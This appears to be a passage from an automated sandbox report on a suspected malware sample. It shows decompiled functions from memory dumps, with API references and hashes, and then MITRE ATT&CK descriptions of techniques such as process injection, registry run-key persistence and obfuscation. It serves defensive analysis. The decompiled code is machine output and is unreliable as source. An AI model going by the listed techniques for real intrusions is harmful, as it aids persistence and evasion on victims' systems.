							return E0042FAF0(_t40, _t56);
						} else {
							continue;
						}
						goto L14;
					}
					_t42 =  *0x4bcb70; // 0x1c40dc4
					E0042FB04(_t42, 2,  &_v8);
					_push(_t70);
					_push( *[fs:eax]);
					 *[fs:eax] = _t73;
					_v17 = E0045AC54( &_v8, 0, _t70);
					_pop(_t68);
					_t59 = 0x45ae7b;
					 *[fs:eax] = _t68;
					_push(0x45ae82);
					_t48 =  *0x4bcb70; // 0x1c40dc4
					return E0042FAF0(_t48, _t59);
				}
				L14:
			}

0x0045ada8
0x0045ada9
0x0045adab
0x0045adaf
0x0045adb1
0x0045adbb
0x0045adc4
0x0045aec3
0x0045adca
0x0045add4
0x0045add6
0x0045add6
0x0045ade6
0x0045ade8
0x0045ade8
0x0045adf2
0x0045adf4
0x0045adf4
0x0045ae00
0x0045ae06
0x0045ae0b
0x0045ae12
0x0045ae13
0x0045ae18
0x0045ae1b
0x0045ae1e
0x0045ae1e
0x0045ae30
0x0045ae37
0x00000000
0x00000000
0x0045ae86
0x0045ae90
0x0045ae92
0x0045ae93
0x0045ae96
0x0045ae9b
0x0045aea5
0x00000000
0x00000000
0x00000000
0x00000000
0x0045ae86
0x0045ae3c
0x0045ae41
0x0045ae48
0x0045ae4e
0x0045ae51
0x0045ae60
0x0045ae65
0x0045ae67
0x0045ae68
0x0045ae6b
0x0045ae70
0x0045ae7a
0x0045ae7a
0x00000000

APIs

GetKeyState.USER32(00000010), ref: 0045ADCC
GetKeyState.USER32(00000011), ref: 0045ADDE

Strings

, xrefs: 0045ADEE

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: State
String ID:
API String ID: 1649606143-3916222277
Opcode ID: f0dad1d55eceefc5299393bb36a9f3caed0e5048163ae2ca1a4ba1bcacdc4e33
Instruction ID: 3313a7cf3521f3f05c2e0b82fa23d9ff4d793afa3af55dbb8c220bc4b0b642ac
Opcode Fuzzy Hash: f0dad1d55eceefc5299393bb36a9f3caed0e5048163ae2ca1a4ba1bcacdc4e33
Instruction Fuzzy Hash: 77313E30A48204EFDB11DFA5E85279EB7F5EB45304F5485BBEC00A7292E77C5E18C62A

Uniqueness

Uniqueness Score: -1.00%

Function 0040AFB0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74
threadCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E0040AFB0(void* __eax, void* __ebx, intOrPtr* __edx, void* __esi, intOrPtr _a4) {
				char _v8;
				short _v18;
				short _v22;
				struct _SYSTEMTIME _v24;
				char _v280;
				char* _t32;
				intOrPtr* _t49;
				intOrPtr _t58;
				void* _t63;
				void* _t67;

				_v8 = 0;
				_t49 = __edx;
				_t63 = __eax;
				_push(_t67);
				_push(0x40b08e);
				_push( *[fs:eax]);
				 *[fs:eax] = _t67 + 0xfffffeec;
				E004043D8(__edx);
				_v24 =  *((intOrPtr*)(_a4 - 0xe));
				_v22 =  *((intOrPtr*)(_a4 - 0x10));
				_v18 =  *((intOrPtr*)(_a4 - 0x12));
				if(_t63 > 2) {
					E00404470( &_v8, 0x40b0b0);
				} else {
					E00404470( &_v8, 0x40b0a4);
				}
				_t32 = E00404898(_v8);
				if(GetDateFormatA(GetThreadLocale(), 4,  &_v24, _t32,  &_v280, 0x100) != 0) {
					E00404648(_t49, 0x100,  &_v280);
					if(_t63 == 1 &&  *((char*)( *_t49)) == 0x30) {
						E004048F8( *_t49, E00404698( *_t49) - 1, 2, _t49);
					}
				}
				_pop(_t58);
				 *[fs:eax] = _t58;
				_push(E0040B095);
				return E004043D8( &_v8);
			}

0x0040afbd
0x0040afc0
0x0040afc2
0x0040afc6
0x0040afc7
0x0040afcc
0x0040afcf
0x0040afd4
0x0040afe0
0x0040afeb
0x0040aff6
0x0040affd
0x0040b016
0x0040afff
0x0040b007
0x0040b007
0x0040b02a
0x0040b043
0x0040b052
0x0040b058
0x0040b073
0x0040b073
0x0040b058
0x0040b07a
0x0040b07d
0x0040b080
0x0040b08d

APIs

GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,0040B08E), ref: 0040B036
GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100), ref: 0040B03C

Strings

yyyy, xrefs: 0040B011

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: DateFormatLocaleThread
String ID: yyyy
API String ID: 3303714858-3145165042
Opcode ID: 9765545c9fd2369f6b65f8f28f3195143eea0d5168a48c19beb4648664a038ec
Instruction ID: 72c1e3b354d4bdb33c578361660b6ce124898dfae790b750eb2de80324a6d621
Opcode Fuzzy Hash: 9765545c9fd2369f6b65f8f28f3195143eea0d5168a48c19beb4648664a038ec
Instruction Fuzzy Hash: DA2162786002189BDB15FBA5C842AAFB3A8EF49300F51447AB914F7391E7789E04876E

Uniqueness

Uniqueness Score: -1.00%

Function 0042D390, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E0042D390(intOrPtr __eax, void* __edx, void* __edi) {
				intOrPtr _v8;
				char _v92;
				void* __ebx;
				void* __esi;
				void* __ebp;
				void* _t46;
				intOrPtr _t55;
				intOrPtr _t60;
				void* _t62;
				void* _t63;
				void* _t64;
				void* _t67;
				void* _t69;
				intOrPtr _t70;

				_t62 = __edi;
				_t67 = _t69;
				_t70 = _t69 + 0xffffffa8;
				_push(_t63);
				_t46 = __edx;
				_v8 = __eax;
				if(__edx == 0) {
					L2:
					E0042DB58(_v8);
					_push("�A&");
					L00406AC4();
					_push(_t67);
					_push(0x42d450);
					_push( *[fs:eax]);
					 *[fs:eax] = _t70;
					if(_t46 == 0) {
						E00402FB0( &_v92, 0x54);
						E0042DE28(_v8, _t46, 0, 0, _t62, _t63, 0, 0,  &_v92);
					} else {
						_t64 = _t46;
						E0042C844( *((intOrPtr*)(_t64 + 0x28)));
						E0042C848( *((intOrPtr*)(_v8 + 0x28)));
						 *((intOrPtr*)(_v8 + 0x28)) =  *((intOrPtr*)(_t64 + 0x28));
						 *((char*)(_v8 + 0x21)) =  *((intOrPtr*)(_t64 + 0x21));
						 *((intOrPtr*)(_v8 + 0x34)) =  *((intOrPtr*)(_t64 + 0x34));
						 *((char*)(_v8 + 0x38)) =  *((intOrPtr*)(_t64 + 0x38));
					}
					_pop(_t55);
					 *[fs:eax] = _t55;
					_push(0x42d457);
					_push("�A&");
					L00406C2C();
					return 0;
				} else {
					_t60 =  *0x4274c0; // 0x42750c
					if(E004037A4(__edx, _t60) == 0) {
						return E0041CE6C(_v8, _t46);
					} else {
						goto L2;
					}
				}
			}

0x0042d390
0x0042d391
0x0042d393
0x0042d397
0x0042d398
0x0042d39a
0x0042d39f
0x0042d3b6
0x0042d3b9
0x0042d3be
0x0042d3c3
0x0042d3ca
0x0042d3cb
0x0042d3d0
0x0042d3d3
0x0042d3d8
0x0042d41f
0x0042d433
0x0042d3da
0x0042d3da
0x0042d3df
0x0042d3ea
0x0042d3f5
0x0042d3fe
0x0042d407
0x0042d410
0x0042d410
0x0042d43a
0x0042d43d
0x0042d440
0x0042d445
0x0042d44a
0x0042d44f
0x0042d3a1
0x0042d3a3
0x0042d3b0
0x0042d486
0x00000000
0x00000000
0x00000000
0x0042d3b0

APIs

RtlEnterCriticalSection.KERNEL32(A&), ref: 0042D3C3
RtlLeaveCriticalSection.KERNEL32(A&,0042D457,00000000,0042D450,?,A&), ref: 0042D44A

Part of subcall function 0042DE28: RtlEnterCriticalSection.KERNEL32(A&), ref: 0042DECB
Part of subcall function 0042DE28: RtlLeaveCriticalSection.KERNEL32(A&,0042DF16,A&), ref: 0042DF09

Strings

A&, xrefs: 0042D3BE, 0042D445

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterLeave
String ID: A&
API String ID: 3168844106-3747508005
Opcode ID: 6a2c9183ce3c5384685ee39594225f1b2e16a33661dc46d9b70cb1f32ac516eb
Instruction ID: 908683b94f32be2ac22323472a605587185e94e47de9b6179565e8b4e1442dc2
Opcode Fuzzy Hash: 6a2c9183ce3c5384685ee39594225f1b2e16a33661dc46d9b70cb1f32ac516eb
Instruction Fuzzy Hash: 4C21B334B042549FC710EFA9D9C2A9EBBF4EF48314BA041BAA845A7751CA38ED01DA58

Uniqueness

Uniqueness Score: -1.00%

Function 0042DE28, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E0042DE28(intOrPtr __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, intOrPtr _a4, char _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t62;
				intOrPtr _t64;
				intOrPtr _t67;
				void* _t77;
				void* _t78;
				intOrPtr _t79;
				intOrPtr _t80;

				_t77 = _t78;
				_t79 = _t78 + 0xfffffff8;
				_v8 = __eax;
				_v12 = E004035DC(1);
				_push(_t77);
				_push(0x42deaf);
				_push( *[fs:eax]);
				 *[fs:eax] = _t79;
				 *((intOrPtr*)(_v12 + 8)) = __edx;
				 *((intOrPtr*)(_v12 + 0x10)) = __ecx;
				memcpy(_v12 + 0x18, _a12, 0x15 << 2);
				_t80 = _t79 + 0xc;
				 *((char*)(_v12 + 0x70)) = _a8;
				if( *((intOrPtr*)(_v12 + 0x2c)) != 0) {
					 *((intOrPtr*)(_v12 + 0x14)) =  *((intOrPtr*)(_v12 + 8));
				}
				_t62 =  *0x41a8a4; // 0x41a8f0
				 *((intOrPtr*)(_v12 + 0x6c)) = E004037C8(_a4, _t62);
				_pop(_t64);
				 *[fs:eax] = _t64;
				_push("�A&");
				L00406AC4();
				_push(_t77);
				_push(0x42df0f);
				_push( *[fs:edx]);
				 *[fs:edx] = _t80;
				E0042C848( *((intOrPtr*)(_v8 + 0x28)));
				 *((intOrPtr*)(_v8 + 0x28)) = _v12;
				E0042C844(_v12);
				_pop(_t67);
				 *[fs:eax] = _t67;
				_push(0x42df16);
				_push("�A&");
				L00406C2C();
				return 0;
			}

0x0042de29
0x0042de2b
0x0042de35
0x0042de44
0x0042de49
0x0042de4a
0x0042de4f
0x0042de52
0x0042de58
0x0042de5e
0x0042de71
0x0042de71
0x0042de79
0x0042de83
0x0042de8e
0x0042de8e
0x0042de94
0x0042dea2
0x0042dea7
0x0042deaa
0x0042dec6
0x0042decb
0x0042ded2
0x0042ded3
0x0042ded8
0x0042dedb
0x0042dee4
0x0042deef
0x0042def2
0x0042def9
0x0042defc
0x0042deff
0x0042df04
0x0042df09
0x0042df0e

APIs

RtlEnterCriticalSection.KERNEL32(A&), ref: 0042DECB
RtlLeaveCriticalSection.KERNEL32(A&,0042DF16,A&), ref: 0042DF09

Strings

A&, xrefs: 0042DEC6, 0042DF04

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterLeave
String ID: A&
API String ID: 3168844106-3747508005
Opcode ID: ddbc8fc78b6c7f1fa93ca66b9a9f7a22e2fdfe8cb1ecc04daa0821806b82dd7b
Instruction ID: 12cd8a3e89b4db3b2346efe9eb26de6beb34a5937bc5b8145537d2d7458227e8
Opcode Fuzzy Hash: ddbc8fc78b6c7f1fa93ca66b9a9f7a22e2fdfe8cb1ecc04daa0821806b82dd7b
Instruction Fuzzy Hash: 44216D74A04208AFC711DF69D88198DBBF5FF49720B6281AAF844A7361C674AD41CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00447100, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00447100(void* __eflags, intOrPtr _a4) {
				char _v5;
				struct tagRECT _v21;
				struct tagRECT _v40;
				void* _t40;
				void* _t41;
				void* _t46;

				_v5 = 1;
				_t45 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30)) + 0x198));
				_t46 = E0041C898( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30)) + 0x198)),  *((intOrPtr*)(_a4 - 4)));
				if(_t46 <= 0) {
					L5:
					_v5 = 0;
				} else {
					do {
						_t46 = _t46 - 1;
						_t40 = E0041C834(_t45, _t41, _t46);
						if( *((char*)(_t40 + 0x57)) == 0 || ( *(_t40 + 0x50) & 0x00000040) == 0) {
							goto L4;
						} else {
							E004466E4(_t40,  &_v40);
							IntersectRect( &_v21, _a4 + 0xffffffec,  &_v40);
							if(EqualRect( &_v21, _a4 + 0xffffffec) == 0) {
								goto L4;
							}
						}
						goto L6;
						L4:
					} while (_t46 > 0);
					goto L5;
				}
				L6:
				return _v5;
			}

0x00447109
0x00447116
0x00447129
0x0044712d
0x0044717d
0x0044717d
0x0044712f
0x0044712f
0x0044712f
0x00447139
0x0044713f
0x00000000
0x00447147
0x0044714c
0x00447160
0x00447177
0x00000000
0x00000000
0x00447177
0x00000000
0x00447179
0x00447179
0x00000000
0x0044712f
0x00447181
0x0044718a

APIs

IntersectRect.USER32(?,?,?), ref: 00447160
EqualRect.USER32 ref: 00447170

Strings

@, xrefs: 00447141

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: Rect$EqualIntersect
String ID: @
API String ID: 3291753422-2766056989
Opcode ID: 4d2859a6f689d045f69b750fe6ea78c87270f48bbb28b3f452f74f07d38d333f
Instruction ID: ae26e8324eb68ea108a47afbcfa4f8a7a3ce0fc142bf4169a9f1199e3112fd89
Opcode Fuzzy Hash: 4d2859a6f689d045f69b750fe6ea78c87270f48bbb28b3f452f74f07d38d333f
Instruction Fuzzy Hash: 42118F31A082485BD701EA6CC884BDF7BE89F49318F040296FD04EB382D739DD058794

Uniqueness

Uniqueness Score: -1.00%

Function 0046FAC4, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E0046FAC4(char __edx, void* __edi, void* __esi, void* __fp0) {
				char _v5;
				void* __ebx;
				void* __ecx;
				void* __ebp;
				void* _t15;
				signed int _t24;
				signed int _t25;
				signed int _t28;
				void* _t31;
				void* _t34;
				void* _t35;
				char _t36;
				signed int _t40;
				void* _t42;
				void* _t43;
				void* _t44;
				void* _t45;
				void* _t50;

				_t50 = __fp0;
				_t43 = __esi;
				_t42 = __edi;
				_t36 = __edx;
				if(__edx != 0) {
					_t45 = _t45 + 0xfffffff0;
					_t15 = E00403984(_t15, _t44);
				}
				_v5 = _t36;
				_t34 = _t15;
				E004492A4(_t34, _t35, 0, _t42, _t43, _t50);
				E004464D8(_t34, GetSystemMetrics(2));
				E004464FC(_t34, GetSystemMetrics(0x14));
				_t24 =  *(_t34 + 0x4c);
				_t40 = _t24;
				_t25 = _t24 >> 1;
				if(0 < 0) {
					asm("adc eax, 0x0");
				}
				E004464FC(_t34, _t40 + _t25);
				 *((char*)(_t34 + 0x208)) = 1;
				 *((char*)(_t34 + 0x21f)) = 0;
				 *((short*)(_t34 + 0x21c)) = 0;
				 *((short*)(_t34 + 0x210)) = 0;
				 *((short*)(_t34 + 0x212)) = 0x64;
				 *((intOrPtr*)(_t34 + 0x214)) = 1;
				 *((char*)(_t34 + 0x228)) = 1;
				 *((char*)(_t34 + 0x229)) = 1;
				 *((char*)(_t34 + 0x21e)) = 1;
				_t28 =  *0x46fb8c; // 0x80
				 *(_t34 + 0x50) =  !_t28 &  *(_t34 + 0x50);
				_t31 = _t34;
				if(_v5 != 0) {
					E004039DC(_t31);
					_pop( *[fs:0x0]);
				}
				return _t34;
			}

0x0046fac4
0x0046fac4
0x0046fac4
0x0046fac4
0x0046facb
0x0046facd
0x0046fad0
0x0046fad0
0x0046fad5
0x0046fad8
0x0046fade
0x0046faee
0x0046fafe
0x0046fb03
0x0046fb06
0x0046fb08
0x0046fb0a
0x0046fb0c
0x0046fb0c
0x0046fb13
0x0046fb18
0x0046fb1f
0x0046fb26
0x0046fb2f
0x0046fb38
0x0046fb41
0x0046fb4b
0x0046fb52
0x0046fb59
0x0046fb60
0x0046fb6a
0x0046fb6d
0x0046fb73
0x0046fb75
0x0046fb7a
0x0046fb81
0x0046fb89

APIs

GetSystemMetrics.USER32 ref: 0046FAE5
GetSystemMetrics.USER32 ref: 0046FAF5

Strings

d, xrefs: 0046FB38

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: MetricsSystem
String ID: d
API String ID: 4116985748-2564639436
Opcode ID: 3790f5cc04b8850676be5841b0fc3ab8dda7e5c60d3cc87a6ac301d7d5c96fbb
Instruction ID: 1d1a04d975221d904c01a2e751fe48b69471b0669f5214f53588a403f038cca9
Opcode Fuzzy Hash: 3790f5cc04b8850676be5841b0fc3ab8dda7e5c60d3cc87a6ac301d7d5c96fbb
Instruction Fuzzy Hash: D81154617442849EEB00EF7DD8CA3957A905F1531CF0841BDEC488F397E6BFA548876A

Uniqueness

Uniqueness Score: -1.00%

Function 0043005C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E0043005C(intOrPtr _a4, intOrPtr _a8, signed int _a12) {
				void* __ebx;
				void* __esi;
				void* __ebp;
				void* _t15;
				void* _t16;
				intOrPtr _t18;
				signed int _t19;
				void* _t20;
				intOrPtr _t21;

				_t19 = _a12;
				if( *0x4bc92f != 0) {
					_t16 = 0;
					if((_t19 & 0x00000003) != 0) {
						L7:
						_t16 = 0x12340042;
					} else {
						_t21 = _a4;
						if(_t21 >= 0 && _t21 < GetSystemMetrics(0) && _a8 >= 0 && GetSystemMetrics(1) > _a8) {
							goto L7;
						}
					}
				} else {
					_t18 =  *0x4bc910; // 0x43005c
					 *0x4bc910 = E0042FDB8(3, _t15, "MonitorFromPoint", _t18, _t20);
					_t16 =  *0x4bc910(_a4, _a8, _t19);
				}
				return _t16;
			}

0x00430062
0x0043006c
0x00430096
0x0043009f
0x004300c7
0x004300c7
0x004300a1
0x004300a1
0x004300a6
0x00000000
0x00000000
0x004300a6
0x0043006e
0x00430073
0x00430080
0x00430092
0x00430092
0x004300d2

APIs

GetSystemMetrics.USER32 ref: 004300AA
GetSystemMetrics.USER32 ref: 004300BC

Part of subcall function 0042FDB8: GetProcAddress.KERNEL32(75490000,00000000,00000000,0042FE82), ref: 0042FE3C

Strings

MonitorFromPoint, xrefs: 0043006E

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: MetricsSystem$AddressProc
String ID: MonitorFromPoint
API String ID: 1792783759-1072306578
Opcode ID: e1cb2bee3c50bea4e161f18fc3fd2d5f93892fecf2ba1476a34614ff905d67a3
Instruction ID: f31d48d4fa32f0209276210ebed0a68fd131649c1defd771c6d0b175906453f7
Opcode Fuzzy Hash: e1cb2bee3c50bea4e161f18fc3fd2d5f93892fecf2ba1476a34614ff905d67a3
Instruction Fuzzy Hash: 3401F271203208EFEB148F11ECC5F9A7B71EB48758F406236F9148F251C3769C0087A8

Uniqueness

Uniqueness Score: -1.00%

Function 0042FF34, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E0042FF34(intOrPtr* _a4, signed int _a8) {
				void* __ebx;
				void* __esi;
				void* __ebp;
				intOrPtr* _t14;
				intOrPtr _t16;
				signed int _t17;
				void* _t18;
				void* _t19;

				_t17 = _a8;
				_t14 = _a4;
				if( *0x4bc92e != 0) {
					_t19 = 0;
					if((_t17 & 0x00000003) != 0 ||  *((intOrPtr*)(_t14 + 8)) > 0 &&  *((intOrPtr*)(_t14 + 0xc)) > 0 && GetSystemMetrics(0) >  *_t14 && GetSystemMetrics(1) >  *((intOrPtr*)(_t14 + 4))) {
						_t19 = 0x12340042;
					}
				} else {
					_t16 =  *0x4bc90c; // 0x42ff34
					 *0x4bc90c = E0042FDB8(2, _t14, "MonitorFromRect", _t16, _t18);
					_t19 =  *0x4bc90c(_t14, _t17);
				}
				return _t19;
			}

0x0042ff3a
0x0042ff3d
0x0042ff47
0x0042ff6c
0x0042ff75
0x0042ff9c
0x0042ff9c
0x0042ff49
0x0042ff4e
0x0042ff5b
0x0042ff68
0x0042ff68
0x0042ffa7

APIs

GetSystemMetrics.USER32 ref: 0042FF85
GetSystemMetrics.USER32 ref: 0042FF91

Part of subcall function 0042FDB8: GetProcAddress.KERNEL32(75490000,00000000,00000000,0042FE82), ref: 0042FE3C

Strings

MonitorFromRect, xrefs: 0042FF49

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: MetricsSystem$AddressProc
String ID: MonitorFromRect
API String ID: 1792783759-4033241945
Opcode ID: cd32cc2d0fc1bee38542657140d82b576de08b3cfa5db766b9202f5208fdad25
Instruction ID: b141c8f1244ddef99d9ba07b94cb809abcc4167537fe89a01e4fabc4be78ebec
Opcode Fuzzy Hash: cd32cc2d0fc1bee38542657140d82b576de08b3cfa5db766b9202f5208fdad25
Instruction Fuzzy Hash: 72014F713001289BEB108B25EAC5B56B775DB46355FC68177E944CB202C378AC488BA9

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

